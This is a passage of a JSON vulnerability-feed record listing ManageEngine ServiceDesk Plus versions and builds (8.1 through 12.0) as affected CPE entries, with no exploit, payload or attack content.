"zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "12.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "12.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "12.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.1:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8201:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8202:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8203:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8204:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8205:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8206:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8207:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8208:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8209:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8210:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8211:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8212:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8213:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8214:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8215:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8216:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8217:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9000:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9001:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9002:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9003:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9004:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9005:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9006:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9007:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9008:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9009:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9010:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9011:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9012:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9013:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9014:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9016:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9017:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9018:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9019:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9020:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9021:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9022:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9023:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9024:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9025:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9026:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9027:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9028:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9029:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9030:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9031:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9032:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9033:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9034:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9035:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9036:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9037:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9038:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9039:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9040:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9041:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9042:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9043:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9044:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9045:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9046:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9047:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9048:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9049:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9100:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9101:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9102:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9103:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9104:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9105:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9106:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9107:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9108:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9109:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9110:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9111:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9112:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9113:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9114:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9115:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9116:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9117:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9118:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9119:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9120:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9121:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9200:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9201:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9202:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9203:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9204:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9205:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9206:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9207:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9208:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9209:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9210:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9211:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9212:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9213:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9214:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9215:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9216:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9217:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9218:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9219:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9220:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9221:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9222:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9223:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9224:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9225:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9226:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9227:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9228:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9229:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9230:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9231:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9232:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9233:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9234:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9235:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9236:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9237:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9238:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9239:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9240:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9241:*:*:*:*:*:*", 